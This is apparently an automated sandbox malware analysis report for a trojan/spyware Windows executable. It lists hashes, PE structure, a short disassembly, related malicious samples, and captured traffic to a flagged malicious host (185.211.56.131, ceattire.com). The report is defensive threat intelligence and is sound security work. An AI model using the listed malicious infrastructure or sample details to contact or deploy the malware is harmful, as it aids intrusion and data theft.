25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.211.56.131	ceattire.com	Iran (ISLAMIC Republic Of)		39368	SERVERIR	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	448876
Start date:	14.07.2021
Start time:	20:00:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 12s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	ZGNX11JMSc.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@6/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 97.2% (good quality ratio 82.1%) Quality average: 69.4% Quality standard deviation: 35.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, conhost.exe, SgrmBroker.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.42.151.234, 92.122.145.220, 52.147.198.201, 13.88.21.125, 95.100.54.203, 20.82.210.154, 205.185.216.42, 205.185.216.10, 40.112.88.60, 20.50.102.62, 23.10.249.43, 23.10.249.26, 20.54.110.249, 20.54.7.98, 20.190.160.7, 20.190.160.133, 20.190.160.9, 20.190.160.1, 20.190.160.74, 20.190.160.130, 20.190.160.70, 20.190.160.131, 51.104.136.2, 20.49.150.241, 20.190.160.5, 20.190.160.68, 20.190.160.135 Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, settingsfd-prod-neu2-endpoint.trafficmanager.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, cds.d2s7q6s2.hwcdn.net, www.tm.a.prd.aadg.akadns.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
137gate.com	spices requirement.xlsx	Get hash	malicious	Browse	31.44.185.28

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SERVERIR	dqVPlpmWYt.exe	Get hash	malicious	Browse	185.211.56.76
	_RFQ_Hongjin_.xlsx	Get hash	malicious	Browse	194.5.178.163
	Ljn1KvO03H.exe	Get hash	malicious	Browse	194.5.178.163
	SWIFT Payment Advise 39 430-25.exe	Get hash	malicious	Browse	194.5.178.163
	Purchase Order SC_695853.xlsx	Get hash	malicious	Browse	194.5.178.163
	Required.exe	Get hash	malicious	Browse	194.5.178.163
	Zahlung-06.11.20.exe	Get hash	malicious	Browse	185.211.57.58
	Fax.doc	Get hash	malicious	Browse	185.81.96.14
	INV-40288731950.doc	Get hash	malicious	Browse	185.81.96.5
	INV-40288731950.doc	Get hash	malicious	Browse	185.81.96.5
	http://profile113001.wellsfargo044514.com/?jg1xllmr6f	Get hash	malicious	Browse	185.165.28.163
	13140000.svchost.exe	Get hash	malicious	Browse	192.36.148.17
	cutwail.exe	Get hash	malicious	Browse	192.36.148.17

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.7769054763067915
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ZGNX11JMSc.exe
File size:	267376
MD5:	fcfb0ec70f1419ede8a534cc95cb61e9
SHA1:	d3b529d77f1de00d63a75b3956d4bcf6bbce30ca
SHA256:	ff1b034c7060724133c6df0aa8cf5411ec0e6775d3aca83a127617340a8c588a
SHA512:	ffec36b157f889a2bd351b9d8423b247138a5fd2e57de83bb1253336518431136a265d244b653af470a8d04e2674c4cadf467c065a7fc38f10effedd705ab248
SSDEEP:	1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................................Rich............PE..L.....FR.................`..........p........p....@................

File Icon


Icon Hash:	e8ccce8e8ececce8

Static PE Info

General
Entrypoint:	0x401470
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5246CAE2 [Sat Sep 28 12:26:10 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a6a8fddf213e725d12277ffa52409c50

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Overbee@NONASSUM.DRA, CN=skrdd, OU=UNDE, O=prototypi, L=Nyordn5, S=sobs, C=MG
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	7/13/2021 10:05:37 AM 7/13/2022 10:05:37 AM
Subject Chain	E=Overbee@NONASSUM.DRA, CN=skrdd, OU=UNDE, O=prototypi, L=Nyordn5, S=sobs, C=MG
Version:	3
Thumbprint MD5:	9036914828CBB0BD5603E92A0629EBCE
Thumbprint SHA-1:	502D44A3683EF19D6EE93B5A0BA39CEF214FA587
Thumbprint SHA-256:	D8DC1D893CD8ACCF7B4CB8910AC7F2C4539AB530AD74E93F825CCDA9E5C58408
Serial:	00

Entrypoint Preview

Instruction
push 004316D0h
call 00007FA2E473CA63h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov dl, 30h
sal dword ptr [edx+edx*2-43B57C63h], 1
mov dl, 66h
imul edi, eax, 78h
inc eax
pop edx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
add byte ptr [esi], al
push eax
add dword ptr [ecx], 55h
insb
outsb
imul eax, dword ptr [eax], 00006496h
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
adc dl, ch
popfd
or al, 2Dh
stc
cli
inc edi
cmp byte ptr [ebx+68h], FFFFFF94h
fdivr st(0), st(3)
dec esp
push ds
sbb ecx, dword ptr fs:[ebx]
dec edx
xchg eax, esi
add dword ptr [esi-51C24BC0h], ebx
retf 1486h
outsb
sbb eax, 33AD4F3Ah
cdq
iretw
adc dword ptr [edi+00AA000Ch], esi
pushad
rcl dword ptr [ebx+00000000h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jbe 00007FA2E473CA72h
add eax, dword ptr [eax]
xor byte ptr [ebp+00h], dh
add byte ptr [eax], al
add eax, 6D655400h
jo 00007FA2E473CAA5h
add byte ptr [53000501h], cl
inc ecx
dec ebp
dec ebp
inc ebp
add byte ptr [ecx], bl
add dword ptr [eax], eax
inc edx
add byte ptr [edx], ah
add byte ptr [ebx], ah
out dx, al
je 00007FA2E473CA72h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x36404	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x7a92	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x40058	0x1418
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1120	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x118	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x35930	0x36000	False	0.255479600694	data	4.71656794382	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x37000	0xbd4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x38000	0x7a92	0x8000	False	0.294891357422	data	4.41054714474	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3f42a	0x668	data
RT_ICON	0x3f142	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 998965248, next used block 48059
RT_ICON	0x3ef5a	0x1e8	data
RT_ICON	0x3ee32	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x3df8a	0xea8	data
RT_ICON	0x3d6e2	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
RT_ICON	0x3d01a	0x6c8	data
RT_ICON	0x3cab2	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x3a50a	0x25a8	data
RT_ICON	0x39462	0x10a8	data
RT_ICON	0x38ada	0x988	data
RT_ICON	0x38672	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x385c4	0xae	data
RT_VERSION	0x38300	0x2c4	data	Swahili	Kenya
RT_VERSION	0x38300	0x2c4	data	Swahili	Mozambiq

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaFileOpen, __vbaNew2, __vbaInStr, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaLateMemCall, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaAryCopy, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0441 0x04b0
LegalCopyright	ON24
InternalName	ANTISOCIA
FileVersion	7.00
CompanyName	ON24
LegalTrademarks	ON24
Comments	ON24
ProductName	ON24
ProductVersion	7.00
FileDescription	ON24
OriginalFilename	ANTISOCIA.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Swahili	Kenya
Swahili	Mozambiq

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 14, 2021 20:08:58.634670973 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:08:59.923051119 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:08:59.923377037 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:08:59.924114943 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.012919903 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.014100075 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.014125109 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.014154911 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.014173985 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.014192104 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.014214993 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.014234066 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.014255047 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.014271975 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.014291048 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.014573097 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.101995945 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.102018118 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.102031946 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.102046013 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.102068901 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.102082968 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.102097034 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.102111101 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.102124929 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.102138996 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.102154016 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.102375031 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.193284035 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.193300962 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.193320036 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.193449974 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.193476915 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.193555117 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.193578959 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.193598986 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.193617105 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.193641901 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.193659067 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.193676949 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.193681955 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.193686962 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.193695068 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.193721056 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.193780899 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.194387913 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.194524050 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.280601978 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.280870914 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.280901909 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.280919075 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.281073093 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.281217098 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.281236887 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.281349897 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.281457901 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.281476021 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.281569004 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.281757116 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.281775951 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.281799078 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.281816959 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.281840086 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.281945944 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.282046080 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.282073021 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.282093048 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.282179117 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.282200098 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.282215118 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.282223940 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.282376051 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.368174076 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.368201971 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.368227959 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.368256092 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.368391991 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.368392944 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.368423939 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.368447065 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.368451118 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.368479967 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.368483067 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.368515968 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.368554115 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.368885994 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.368913889 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.368947029 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.368974924 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.369009972 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.369038105 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.369065046 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.369086027 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.369103909 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.369266987 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.369790077 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.369821072 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.370081902 CEST	49752	80	192.168.2.3	185.211.56.131
Jul 14, 2021 20:09:00.370570898 CEST	80	49752	185.211.56.131	192.168.2.3
Jul 14, 2021 20:09:00.370610952 CEST	80	49752	185.211.56.131	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 14, 2021 20:02:30.642527103 CEST	50620	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:30.655448914 CEST	53	50620	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:31.571433067 CEST	64938	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:31.584095955 CEST	53	64938	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:32.510315895 CEST	60152	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:32.523200989 CEST	53	60152	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:32.587184906 CEST	57544	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:32.605686903 CEST	53	57544	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:33.537070990 CEST	55984	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:33.550869942 CEST	53	55984	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:34.214790106 CEST	64185	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:34.227543116 CEST	53	64185	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:35.947537899 CEST	65110	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:35.960964918 CEST	53	65110	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:37.104135990 CEST	58361	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:37.117080927 CEST	53	58361	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:38.090261936 CEST	63492	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:38.103529930 CEST	53	63492	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:39.660625935 CEST	60831	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:39.675513983 CEST	53	60831	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:40.708344936 CEST	60100	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:40.720979929 CEST	53	60100	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:41.357125044 CEST	53195	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:41.370115995 CEST	53	53195	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:42.100497007 CEST	50141	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:42.114434004 CEST	53	50141	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:44.583322048 CEST	53023	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:44.596883059 CEST	53	53023	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:46.039861917 CEST	49563	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:46.053716898 CEST	53	49563	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:46.886287928 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:46.899221897 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:47.861721992 CEST	59349	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:47.875437021 CEST	53	59349	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:48.568396091 CEST	57084	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:48.582041025 CEST	53	57084	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:49.557714939 CEST	58823	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:49.570606947 CEST	53	58823	8.8.8.8	192.168.2.3
Jul 14, 2021 20:02:50.760224104 CEST	57568	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:02:50.773761034 CEST	53	57568	8.8.8.8	192.168.2.3
Jul 14, 2021 20:03:03.608724117 CEST	50540	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:03:03.629317045 CEST	53	50540	8.8.8.8	192.168.2.3
Jul 14, 2021 20:03:09.295696020 CEST	54366	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:03:09.328238964 CEST	53	54366	8.8.8.8	192.168.2.3
Jul 14, 2021 20:03:23.128822088 CEST	53034	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:03:23.142507076 CEST	53	53034	8.8.8.8	192.168.2.3
Jul 14, 2021 20:03:35.130832911 CEST	57762	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:03:35.158247948 CEST	53	57762	8.8.8.8	192.168.2.3
Jul 14, 2021 20:03:45.677521944 CEST	55435	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:03:45.705159903 CEST	53	55435	8.8.8.8	192.168.2.3
Jul 14, 2021 20:03:52.725641012 CEST	50713	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:03:52.748661995 CEST	53	50713	8.8.8.8	192.168.2.3
Jul 14, 2021 20:04:24.462848902 CEST	56132	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:04:24.495644093 CEST	53	56132	8.8.8.8	192.168.2.3
Jul 14, 2021 20:04:27.044578075 CEST	58987	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:04:27.071403980 CEST	53	58987	8.8.8.8	192.168.2.3
Jul 14, 2021 20:05:27.396545887 CEST	56579	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:05:27.487071037 CEST	53	56579	8.8.8.8	192.168.2.3
Jul 14, 2021 20:05:28.735021114 CEST	60633	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:05:28.748531103 CEST	53	60633	8.8.8.8	192.168.2.3
Jul 14, 2021 20:05:29.230933905 CEST	61292	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:05:29.378107071 CEST	53	61292	8.8.8.8	192.168.2.3
Jul 14, 2021 20:05:29.748300076 CEST	63619	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:05:29.842477083 CEST	53	63619	8.8.8.8	192.168.2.3
Jul 14, 2021 20:05:30.268410921 CEST	64938	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:05:30.281388998 CEST	53	64938	8.8.8.8	192.168.2.3
Jul 14, 2021 20:05:30.721730947 CEST	61946	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:05:30.735013962 CEST	53	61946	8.8.8.8	192.168.2.3
